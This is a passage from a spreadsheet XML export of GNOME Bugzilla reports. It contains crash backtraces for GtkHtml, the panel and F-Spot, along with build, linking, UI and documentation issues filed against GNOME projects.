    <t>This is a fairly new bug I think. If you reply in plaintext to a
message containing a signature only the last line of the signature
gets a &gt; in front of it.</t>
  </si>
  <si>
    <t>GTKHTML-240927</t>
  </si>
  <si>
    <t>crash editing buffer</t>
  </si>
  <si>
    <t xml:space="preserve">Package: GtkHtml
Priority: Normal
Version: GNOME2.2.0 1.3.1.99
os_details: Gnome.Org
Synopsis: crash editing buffer
Bugzilla-Product: GtkHtml
Bugzilla-Component: Editing
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
I was trying to reproduce a redraw problem I thought I had seen and so
entered a bunch of random text then hit delete a lot.  Got this crash.
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-1.3'
[New Thread 1024 (LWP 2441)]
[New Thread 2049 (LWP 2444)]
[New Thread 1026 (LWP 2445)]
[New Thread 2051 (LWP 2446)]
[New Thread 3076 (LWP 2447)]
[New Thread 4101 (LWP 2457)]
[New Thread 16390 (LWP 2486)]
0x410574d9 in wait4 () from /lib/libc.so.6
#0  0x410574d9 in wait4 () from /lib/libc.so.6
#1  0x410cf30c in __DTOR_END__ () from /lib/libc.so.6
#2  0x4007183a in waitpid () from /lib/libpthread.so.0
#3  0x40477cd5 in libgnomeui_segv_handle (signum=6) at
gnome-ui-init.c:646
#4  0x4006f307 in pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x40fd50a1 in kill () from /lib/libc.so.6
#7  0x4006efe6 in raise () from /lib/libpthread.so.0
#8  0x40fd6364 in abort () from /lib/libc.so.6
#9  0x40f6f95c in g_logv () from /usr/lib/libglib-2.0.so.0
#10 0x40f6fa03 in g_log () from /usr/lib/libglib-2.0.so.0
#11 0x40efc0d2 in pango_shape () from /usr/lib/libpango-1.0.so.0
#12 0x404077fb in get_glyphs (text=0x41e500d0 painter=0x42a80798)
    at htmltext.c:888
#13 0x40406f0b in calc_word_width (text=0x41e500d0 painter=0x42a80798
    line_offset=0) at htmltext.c:650
#14 0x4040716a in html_text_request_word_width (text=0x41e500d0 
    painter=0x42a80798) at htmltext.c:706
#15 0x40407198 in calc_preferred_width (self=0x41e500d0
painter=0x42a80798)
    at htmltext.c:718
#16 0x403f67ea in html_object_calc_preferred_width (o=0x41e500d0 
    painter=0x42a80798) at htmlobject.c:952
#17 0x403ca2af in calc_min_width (o=0x453b8bf0 painter=0x42a80798)
    at htmlclueflow.c:646
#18 0x403f67be in html_object_calc_min_width (o=0x453b8bf0
painter=0x42a80798)
    at htmlobject.c:941
#19 0x403cac2d in calc_size (o=0x453b8bf0 painter=0x42a80798 
    changed_objs=0xbffff724) at htmlclueflow.c:963
#20 0x403f66b2 in html_object_calc_size (o=0x453b8bf0
painter=0x42a80798 
    changed_objs=0xbffff724) at htmlobject.c:888
#21 0x403ced68 in do_layout (o=0x46452558 painter=0x42a80798
calc_size=1 
    changed_objs=0xbffff724) at htmlcluev.c:202
#22 0x403cefc6 in calc_size (o=0x46452558 painter=0x42a80798 
    changed_objs=0xbffff724) at htmlcluev.c:298
#23 0x403f66b2 in html_object_calc_size (o=0x46452558
painter=0x42a80798 
    changed_objs=0xbffff724) at htmlobject.c:888
#24 0x403ea0ac in html_engine_calc_size (e=0xc139a60
changed_objs=0xbffff724)
    at htmlengine.c:4393
#25 0x403eb21b in thaw_idle (data=0xc139a60) at htmlengine.c:4961
#26 0x40f6b0f8 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
#27 0x40f68ab6 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#28 0x40f698cd in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#29 0x40f69c60 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#30 0x40f6a306 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#31 0x405cd9a2 in bonobo_main () at bonobo-main.c:293
#32 0x0809286c in main (argc=1 argv=0xbffff9e4) at main.c:610
#33 0x40fc41c4 in __libc_start_main () from /lib/libc.so.6
Thread 7 (Thread 16390 (LWP 2486)):
#0  0x40fd5136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40257103 in e_msgport_wait (mp=0x81aade8) at e-msgport.c:302
	_buffer = {__routine = 0x40256ee8  
  __arg = 0x81aade8 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbefffa4c
#4  0x4025781c in thread_dispatch (din=0x81aad90) at e-msgport.c:665
	e = (EThread *) 0x81aad90
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 16390
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 6 (Thread 4101 (LWP 2457)):
#0  0x40fd5136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40257103 in e_msgport_wait (mp=0x41837bb8) at e-msgport.c:302
	_buffer = {__routine = 0x40256ee8  
  __arg = 0x41837bb8 __canceltype = -1088423308 __prev = 0x0}
	msg = (EMsg *) 0xbf1ffa4c
#4  0x4025781c in thread_dispatch (din=0x44753888) at e-msgport.c:665
	e = (EThread *) 0x44753888
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 4101
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 3076 (LWP 2447)):
#0  0x40fd5136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40257103 in e_msgport_wait (mp=0x81aade8) at e-msgport.c:302
	_buffer = {__routine = 0x40256ee8  
  __arg = 0x81aade8 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbf3ffa4c
#4  0x4025781c in thread_dispatch (din=0x81aad90) at e-msgport.c:665
	e = (EThread *) 0x81aad90
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 3076
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 2051 (LWP 2446)):
#0  0x40fd5136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40257103 in e_msgport_wait (mp=0x81aad30) at e-msgport.c:302
	_buffer = {__routine = 0x40256ee8  
  __arg = 0x81aad30 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbf5ffa4c
#4  0x4025781c in thread_dispatch (din=0x81aacd8) at e-msgport.c:665
	e = (EThread *) 0x81aacd8
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 2051
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1026 (LWP 2445)):
#0  0x40fd5136 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x4006ea61 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4006aea8 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40257103 in e_msgport_wait (mp=0x81aac78) at e-msgport.c:302
	_buffer = {__routine = 0x40256ee8  
  __arg = 0x81aac78 __canceltype = 0 __prev = 0x0}
	msg = (EMsg *) 0xbf7ffa4c
#4  0x4025781c in thread_dispatch (din=0x81aac20) at e-msgport.c:665
	e = (EThread *) 0x81aac20
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 1026
#5  0x4006bf77 in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 2049 (LWP 2444)):
#0  0x41081b60 in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x4006bcda in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1024 (LWP 2441)):
#0  0x410574d9 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x410cf30c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4007183a in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40477cd5 in libgnomeui_segv_handle (signum=6) at
gnome-ui-init.c:646
	estatus = 1074244316
	in_segv = 1
	pid = 0
#4  0x4006f307 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x40fd50a1 in kill () from /lib/libc.so.6
No symbol table info available.
#7  0x4006efe6 in raise () from /lib/libpthread.so.0
No symbol table info available.
#8  0x40fd6364 in abort () from /lib/libc.so.6
No symbol table info available.
#9  0x40f6f95c in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x40f6fa03 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#11 0x40efc0d2 in pango_shape () from /usr/lib/libpango-1.0.so.0
No symbol table info available.
#12 0x404077fb in get_glyphs (text=0x41e500d0 painter=0x42a80798)
    at htmltext.c:888
	str = (PangoGlyphString *) 0x455a5ff0
	item = (PangoItem *) 0x464b3db0
	il = (GList *) 0x44753098
	heap = (gchar *) 0x0
	translated = (gchar *) 0xbffff460  
	bytes = 1179336112
	glyphs = (GList *) 0x0
	items = (GList *) 0x44753098
#13 0x40406f0b in calc_word_width (text=0x41e500d0 painter=0x42a80798
    line_offset=0) at htmltext.c:650
	style = 147
	gl = (GList *) 0x1
	glyphs = (GList *) 0x0
	il = (GList *) 0x41e500d0
	items = (GList *) 0x44753098
	font = (HTMLFont *) 0x456077c0
	obj = (HTMLObject *) 0x41e500d0
	begin = (gchar *) 0x0
	end = (gchar *) 0x41e500d0 `\005B@Ã°\213E
	i = 1078058256
	cl = 0
	width = -1073744468
	asc = 2147483647
	dsc = -1073744092
	start_offset = 1105526992
	end_offset = 2147483647
#14 0x4040716a in html_text_request_word_width (text=0x41e500d0 
    painter=0x42a80798) at htmltext.c:706
	text = (HTMLText *) 0x41e500d0
	offset = 1089459616
#15 0x40407198 in calc_preferred_width (self=0x41e500d0
painter=0x42a80798)
    at htmltext.c:718
	self = (HTMLObject *) 0x41e500d0
#16 0x403f67ea in html_object_calc_preferred_width (o=0x41e500d0 
    painter=0x42a80798) at htmlobject.c:952
	o = (HTMLObject *) 0x41e500d0
#17 0x403ca2af in calc_min_width (o=0x453b8bf0 painter=0x42a80798)
    at htmlclueflow.c:646
	cur = (HTMLObject *) 0x41e500d0
	min_width = 0
	aligned_min_width = 0
	w = 0
#18 0x403f67be in html_object_calc_min_width (o=0x453b8bf0
painter=0x42a80798)
    at htmlobject.c:941
	o = (HTMLObject *) 0x453b8bf0
#19 0x403cac2d in calc_size (o=0x453b8bf0 painter=0x42a80798 
    changed_objs=0xbffff724) at htmlclueflow.c:963
	o = (HTMLObject *) 0x453b8bf0
	oa = 15
	od = 0
	ow = 560
	padding = 1161530352
	leaf_children_changed_size = 0
	changed = -1073744392
	changed_size = 0
#20 0x403f66b2 in html_object_calc_size (o=0x453b8bf0
painter=0x42a80798 
    changed_objs=0xbffff724) at htmlobject.c:888
	o = (HTMLObject *) 0x453b8bf0
	rv = 1089459616
#21 0x403ced68 in do_layout (o=0x46452558 painter=0x42a80798
calc_size=1 
    changed_objs=0xbffff724) at htmlcluev.c:202
	old_y = 630
	old_y_off = 615
	new_y_off = 1089459616
	o = (HTMLObject *) 0x46452558
	obj = (HTMLObject *) 0xe0001002
	aclue = (HTMLObject *) 0xe0001002
	local_changed_objs = (GList *) 0x0
	lmargin = 0
	changed = 0
	old_width = 592
	old_ascent = 1440
	old_descent = 0
	new_x = 1089459616
	padding = 0
	padding2 = 0
	first_change = 1
	first_y_off = 0
#22 0x403cefc6 in calc_size (o=0x46452558 painter=0x42a80798 
    changed_objs=0xbffff724) at htmlcluev.c:298
No locals.
#23 0x403f66b2 in html_object_calc_size (o=0x46452558
painter=0x42a80798 
    changed_objs=0xbffff724) at htmlobject.c:888
	o = (HTMLObject *) 0x46452558
	rv = 1089459616
#24 0x403ea0ac in html_engine_calc_size (e=0xc139a60
changed_objs=0xbffff724)
    at htmlengine.c:4393
	e = (HTMLEngine *) 0xc139a60
	max_width = 1
#25 0x403eb21b in thaw_idle (data=0xc139a60) at htmlengine.c:4961
	data = 0x88d0780
	e = (HTMLEngine *) 0xc139a60
	changed_objs = (GList *) 0x0
	redraw_whole = 143460224
	w = 602
	h = 1450
#26 0x40f6b0f8 in g_timeout_add () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#27 0x40f68ab6 in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#28 0x40f698cd in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#29 0x40f69c60 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
No symbol table info available.
#30 0x40f6a306 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#31 0x405cd9a2 in bonobo_main () at bonobo-main.c:293
	loop = (GMainLoop *) 0x80eb478
#32 0x0809286c in main (argc=1 argv=0xbffff9e4) at main.c:610
	argc = -1073743728
	options = {{longName = 0x80b72ed no-splash shortName = 0 '\0' 
    argInfo = 0 arg = 0x80bbea8 val = 0 
    descrip = 0x80b72f7 Disable splash screen argDescrip = 0x0} {
    longName = 0x80b0ab0 offline shortName = 0 '\0' argInfo = 0 
    arg = 0x80bbeb0 val = 0 descrip = 0x80b730d Start in offline
mode 
    argDescrip = 0x0} {longName = 0x80b45fd online shortName = 0
'\0' 
    argInfo = 0 arg = 0x80bbeac val = 0 
    descrip = 0x80b7323 Start in online mode argDescrip = 0x0} {
    longName = 0x80b7338 debug shortName = 0 '\0' argInfo = 1 
    arg = 0x80be170 val = 0 
    descrip = 0x80b78a0 Send the debugging output of all components to
a file. argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0'
argInfo = 4 
    arg = 0x40682804 val = 0 descrip = 0x80b733e Help options: 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 0
    arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
	uri_list = (GSList *) 0x0
	popt_context_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	program = (GnomeProgram *) 0x80c6528
	popt_context = 0x40efd5a0
	args = (char **) 0x40efd5a0
#33 0x40fc41c4 in __libc_start_main () from /lib/libc.so.6
No symbol table info available.
#0  0x410574d9 in wait4 () from /lib/libc.so.6
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-334435</t>
  </si>
  <si>
    <t>crashes on startup</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. by putting deskbar-applet on panel (Add to Panel...-Dialog) or starting it
directly with /usr/lib/deskbar-applet/deskbar-applet
Stack trace:
holger@degenatron:~$ /usr/lib/deskbar-applet/deskbar-applet
Running installed deskbar using
[/usr/lib/python2.3/site-packages/deskbar:$PYTHONPATH]
Data Dir: /usr/local/share/deskbar-applet
Handlers Dir: ['/home/holger/.gnome2/deskbar-applet/handlers'
'/usr/local/lib/deskbar-applet/handlers']
Binding Global shortcut F3 to focus the deskbar
Traceback (most recent call last):
  File /usr/lib/deskbar-applet/deskbar-applet line 41 in ?
    gettext.bind_textdomain_codeset('deskbar-applet''UTF-8')
AttributeError: 'module' object has no attribute 'bind_textdomain_codeset'
Other information:</t>
  </si>
  <si>
    <t>GTK+-62071</t>
  </si>
  <si>
    <t>Assorted deprecations</t>
  </si>
  <si>
    <t>- gtkobject.h has some
 - gtkaccelgroup.h has some private functions
 - gtkitemfactory.h Compatibility functions for deprecated GtkMenuFactory
code</t>
  </si>
  <si>
    <t>GNOME-CORE-50890</t>
  </si>
  <si>
    <t>Crashing Panel</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.4
Synopsis: Crashing Panel
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i586 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.6
gnome-libs: gnome-libs 1.2.11
libxml: 1.8.10
gnome-print: gnome-print-0.25-8_helix_1
gnome-core: gnome-core 1.2.4
Description:
My Panel crashes at random intervals for unknown reason.  I'm running
Gnome Helix-code on RedHat 7.0 on Pentium 200 64Mb RAM.  The only
things running on the machine at time of crash was gkrellm Root-tail
terminal balsa and that's all.  I had been gone all day and when I
returned home and woke the monitor I had the core indicator on the
screen.
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
0x2b09cc39 in __wait4 () from /lib/libc.so.6
#0  0x2b09cc39 in __wait4 () from /lib/libc.so.6
#1  0x2b10653c in __DTOR_END__ () from /lib/libc.so.6
#2  0x2ac0523a in gnome_segv_handle (signum=11) at gnome-init.c:660
#3  
#4  0x2b063426 in _IO_str_init_static (sf=0x7ffff330 ptr=0x0 size=0 
    pstart=0x0) at ../sysdeps/i386/bits/string.h:342
#5  0x2b05a492 in _IO_vsscanf (string=0x0 
    format=0x2b27ca42 %*s %*s %*s %*s %d %*s %d args=0x7ffff418)
    at iovsscanf.c:43
#6  0x2b04e5cd in sscanf (s=0x0 format=0x2b27ca42 %*s %*s %*s %*s %d %*s %d)
    at sscanf.c:38
#7  0x2b2795a0 in imap_check () from /usr/lib/libgen_util_applet.so
#8  0x2b2758b7 in check_mail_file_status () from /usr/lib/libgen_util_applet.so
#9  0x2b275c6c in mail_check_timeout () from /usr/lib/libgen_util_applet.so
#10 0x2ab3f983 in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
#11 0x2ab3e987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#12 0x2ab3f001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#13 0x2ab3f1cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#14 0x2ad4ef87 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#15 0x8056082 in main ()
#16 0x2b009790 in __libc_start_main (main=0x8055d70  argc=5 
    ubp_av=0x7ffffad4 init=0x8053370  fini=0x8093b5c  
    rtld_fini=0x2aab835c  stack_end=0x7ffffacc)
    at ../sysdeps/generic/libc-start.c:111
#0  0x2b09cc39 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x2b10653c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x2ac0523a in gnome_segv_handle (signum=11) at gnome-init.c:660
in_segv.5 = 1
pid = 0
estatus = 136216096
buf = \000J\020+Ã¨Ã±Ã¿\177Ã¼U\006+\234Ãµ\t\bÂ´Ã²Ã¿\177(Ã²Ã¿\177\215'\f+Â´Ã²Ã¿\177
#3  
No locals.
#4  0x2b063426 in _IO_str_init_static (sf=0x7ffff330 ptr=0x0 size=0 
    pstart=0x0) at ../sysdeps/i386/bits/string.h:342
s = 2147480000
ptr = 0x0
size = 0
#5  0x2b05a492 in _IO_vsscanf (string=0x0 
    format=0x2b27ca42 %*s %*s %*s %*s %d %*s %d args=0x7ffff418)
    at iovsscanf.c:43
string = 0x0
ret = -512
sf = {_sbf = {_f = {_flags = -72548352 _IO_read_ptr = 0x0 
      _IO_read_end = 0x0 _IO_read_base = 0x0 _IO_write_base = 0x0 
      _IO_write_ptr = 0x0 _IO_write_end = 0x0 _IO_buf_base = 0x0 
      _IO_buf_end = 0x0 _IO_save_base = 0x0 _IO_backup_base = 0x0 
      _IO_save_end = 0x0 _markers = 0x0 _chain = 0x0 _fileno = 0 
      _blksize = 255 _old_offset = 724040416 _cur_column = 0 
      _vtable_offset = 0 '\000' _shortbuf =  _lock = 0x7ffff310 
      _offset = 0 _codecvt = 0x0 _wide_data = 0x0 _mode = -1 
      _unused2 = '\000' } _vtable = 0x2b1047a0} _s = {
    _allocate_buffer = 0 _free_buffer = 0}}
lock = {__m_reserved = 17 __m_count = 2147480375 __m_owner = 0x1 
  __m_kind = 724012865 __m_lock = {__status = 24 __spinlock = 2147480376}}
#6  0x2b04e5cd in sscanf (s=0x0 format=0x2b27ca42 %*s %*s %*s %*s %d %*s %d)
    at sscanf.c:38
done = -512
#7  0x2b2795a0 in imap_check () from /usr/lib/libgen_util_applet.so
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-02-14 21:00 -------
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (zimmer@ywave.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>zimmer</t>
  </si>
  <si>
    <t>EPIPHANY-106051</t>
  </si>
  <si>
    <t>move stop and reload to the bottom of the view menu</t>
  </si>
  <si>
    <t>http://developer.gnome.org/projects/gup/hig/1.0/menus.html#menu-standard-view
When i first put these in galeon we didn't have a recommendation now we do
I can do this if you like.</t>
  </si>
  <si>
    <t>BUG-BUDDY-51824</t>
  </si>
  <si>
    <t>Bug Buddy: Cannot log bugs against xamian/eazel products any more</t>
  </si>
  <si>
    <t xml:space="preserve">Package: bug-buddy
Severity: minor
Version: 1.90
Synopsis: Bug Buddy: Cannot log bugs against xamian/eazel products any more
Bugzilla-Product: bug-buddy
Bugzilla-Component: general
Description:
After upgrading to the latest Bug Buddy cannot log bugs against red-carpet nor Evolution.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-03-07 12:42 -------
The original reporter (nickg@glencros.demon.co.uk) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jacob@ximian.com.
</t>
  </si>
  <si>
    <t>nickg</t>
  </si>
  <si>
    <t>GNOME-PRINT-112082</t>
  </si>
  <si>
    <t>print dialog does not reflect number of copies in GPConfig</t>
  </si>
  <si>
    <t>Description of Problem:
A few weeks ago I needed to print 2 copies of a
particular document so in the Print dialog I
selected 2 copies. That worked fine but since
then I have been unable to print just a single
copy even though the option is set to just print
1 copy.
Paulo has been able to reproduce this bug as well
but he said its a problem with libgnomeprintui.
[10:32]  here's a weird bug .. for some
reason every time i print from gedit it prints 2
copies
[10:32]  a while back i actually told it to
print 2 copies .. since then it keeps doing it
[10:32]  but the option is set to print 1 copy
[10:33]  EsKi: hmmm.. lemme see
[10:34]  EsKi: I have it too... good catch
[10:34]  please log a bug report
[10:36]  will do
...
[10:47]  I have just ficed your bug
[10:57]  ah tnx
[10:58]  do you still need me to file a PR?
[10:58]  EsKi: yes please since it is
caused by a libgnomeprintui bug
This system is running FreeBSD v4.7 with gedit v2.2.1
Contact me either by email or in #gedit (EsKi)</t>
  </si>
  <si>
    <t>LIBGDA-388023</t>
  </si>
  <si>
    <t>PostgreSQL provider</t>
  </si>
  <si>
    <t>LIBGDA</t>
  </si>
  <si>
    <t>Postgres provider linked against wrong libpq.so</t>
  </si>
  <si>
    <t>I have:
Postgres 8.1.4 installed in /usr/local/pgsql
Postgres 8.2.0 installed in /usr/local/pgsql-8.2.0
I ran configure as follows:
$ CFLAGS=-g -O0 -march=i486 -mcpu=pentium2 \
./configure \
  --prefix=/usr \
  --sysconfdir=/etc \
  --localstatedir=/var/lib \
  --with-postgres=/usr/local/pgsql-8.2.0 \
  --without-bdb \
  --enable-gtk-doc \
  i486-slackware-linux
After installation:
$ ldd /usr/lib/libgda-1.99/providers/libgda-postgres.so
        linux-gate.so.1 =&gt;  (0xffffe000)
        libgda-3.so.3 =&gt; /usr/lib/libgda-3.so.3 (0xb7e70000)
        libgobject-2.0.so.0 =&gt; /usr/lib/libgobject-2.0.so.0 (0xb7e33000)
        libgthread-2.0.so.0 =&gt; /usr/lib/libgthread-2.0.so.0 (0xb7e2e000)
        libgmodule-2.0.so.0 =&gt; /usr/lib/libgmodule-2.0.so.0 (0xb7e2a000)
        libdl.so.2 =&gt; /lib/tls/libdl.so.2 (0xb7e26000)
        libglib-2.0.so.0 =&gt; /usr/lib/libglib-2.0.so.0 (0xb7d86000)
        libxslt.so.1 =&gt; /usr/lib/libxslt.so.1 (0xb7d52000)
        libxml2.so.2 =&gt; /usr/lib/libxml2.so.2 (0xb7c33000)
        libz.so.1 =&gt; /usr/lib/libz.so.1 (0xb7c21000)
        libm.so.6 =&gt; /lib/tls/libm.so.6 (0xb7bfe000)
        libpq.so.4 =&gt; not found
        libpthread.so.0 =&gt; /lib/tls/libpthread.so.0 (0xb7bec000)
        libc.so.6 =&gt; /lib/tls/libc.so.6 (0xb7ad0000)
        libgdasql.so.3 =&gt; /usr/lib/libgdasql.so.3 (0xb7ac2000)
        librt.so.1 =&gt; /lib/tls/librt.so.1 (0xb7aba000)
        /lib/ld-linux.so.2 (0x80000000)
Note that the postgres provider linked against libpq.so.4.  However postgres 8.2.0 contains libpq.so.5 and this is the directory in which configure was directed to find the postgres installation.  
Note that when I set LD_LIBRARY_PATH to the 8.2.0 directory the provider does not work.  When I set it to the 8.1.4 directory the provider does work (because the libpq.so.4 is found of course).</t>
  </si>
  <si>
    <t>mrj001</t>
  </si>
  <si>
    <t>GNUMERIC-413660</t>
  </si>
  <si>
    <t>X-axis labeling is not uniform</t>
  </si>
  <si>
    <t>When resizing a chart certain widths cause non-uniform labeling of the X axis.  For example the interval may be 2 (0 2 4 ...) and then switch to 3 (8 10 13 16 19 ...).  The interval should always be consistent.  Probably the max interval over the entire axis should be calculated and used rather than a local interval based on what is needed to fit the current label.</t>
  </si>
  <si>
    <t>GLIB-348186</t>
  </si>
  <si>
    <t>API documentation needs copyediting</t>
  </si>
  <si>
    <t>Documentation 
Section: every section
The current API documentation of glib (and gtk+) contains a number of stylistic and grammatical infelicities.  I'd like to volunteer to put some work into correcting these.
For example there are a lot of unnecessary commas introducing non-relative clauses (The foo that bar) sentences with complex dependent clauses that should be broken into multiple sentences and the odd malapropism (e.g. I came across malicious condition for error - malicious means intentionally bad which is not what the documentation writer intended).
This isn't just grammatical snobbery - some editing would really make the documentation more readable I think.
As an example of the cleanup I might do I have edited the API documentation for GType (i.e. docs/reference/gobject/tmpl/gtype.sgml) and will submit the results as a patch.
Correct version:
Other information:</t>
  </si>
  <si>
    <t>josh.parsons</t>
  </si>
  <si>
    <t>GLIBMM-527687</t>
  </si>
  <si>
    <t>strings</t>
  </si>
  <si>
    <t>ustring::erase(iterator) incorrect for non ascii characters</t>
  </si>
  <si>
    <t>Please describe the problem:
When erasing a character from a ustring with an iterator if the iterator points to a non ascii character the character doesn't appear to be erased correctly.
Steps to reproduce:
1. Declare a ustring.
2. Put a non ascii character in it.
3. erase the character using an iterator which points to it.
4. print the string
Actual results:
a Glib::ConvertError exception is thrown.
Expected results:
The string is printed out successfully minus the character.
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>GSTREAMER-124006</t>
  </si>
  <si>
    <t>[PATCH] Incorect video src capabilities of visualization plugins</t>
  </si>
  <si>
    <t>mime type property of monoscope goom and synaesthesia plugins is set to
video/raw (should be video/x-raw-rgb). endianness property is also
incorrect - instead of G_BYTE_ORDER (machine dependent) should be B_BIG_ENDIAN</t>
  </si>
  <si>
    <t>mrk</t>
  </si>
  <si>
    <t>F-SPOT-446217</t>
  </si>
  <si>
    <t>Fatal error when trying to export to Picasa Web</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Select one or multiple photos
2. Select export to picasa web
3. The application crashes
Stack trace:
Se produjo una excepciÃ³n no tratada: Object reference not set to an instance of an object
  at Mono.Google.Picasa.PicasaWeb.GetAlbums () [0x00000] 
  at FSpot.GoogleExport.PopulateAlbumOptionMenu (Mono.Google.Picasa.PicasaWeb picasa) [0x00000] 
  at FSpot.GoogleExport.Connect (FSpot.GoogleAccount selected) [0x00000] 
  at FSpot.GoogleExport.Connect () [0x00000] 
  at FSpot.GoogleExport..ctor (IBrowsableCollection selection) [0x00000] 
  at MainWindow.HandleExportToPicasa (System.Object sender System.EventArgs args) [0x00000] 
  at (wrapper delegate-invoke) System.MulticastDelegate:invoke_void_object_EventArgs (objectSystem.EventArgs)
  at GLib.Signal.voidObjectCallback (IntPtr handle IntPtr gch) [0x00000] 
  at (wrapper native-to-managed) GLib.Signal:voidObjectCallback (intptrintptr)
  at  
  at (wrapper managed-to-native) Gtk.Application:gtk_main ()
  at Gtk.Application.Run () [0x00000] 
  at Gnome.Program.Run () [0x00000] 
  at FSpot.Driver.Main (System.String[] args) [0x00000] 
.NET Version: 1.1.4322.2032
Assembly Version Information:
Mono.Security (1.0.5000.0)
System.Xml (1.0.5000.0)
gnome-keyring-sharp (0.0.0.0)
FlickrNet (1.1.0.0)
google-sharp (0.0.0.0)
gconf-sharp (2.16.0.0)
pango-sharp (2.10.0.0)
SemWeb (0.7.1.0)
glade-sharp (2.10.0.0)
gtkhtml-sharp (2.16.0.0)
System.Data (1.0.5000.0)
Mono.Data.SqliteClient (1.0.5000.0)
gdk-sharp (2.10.0.0)
gnome-vfs-sharp (2.16.0.0)
dbus-sharp (0.60.0.0)
System (1.0.5000.0)
Mono.Posix (1.0.5000.0)
atk-sharp (2.10.0.0)
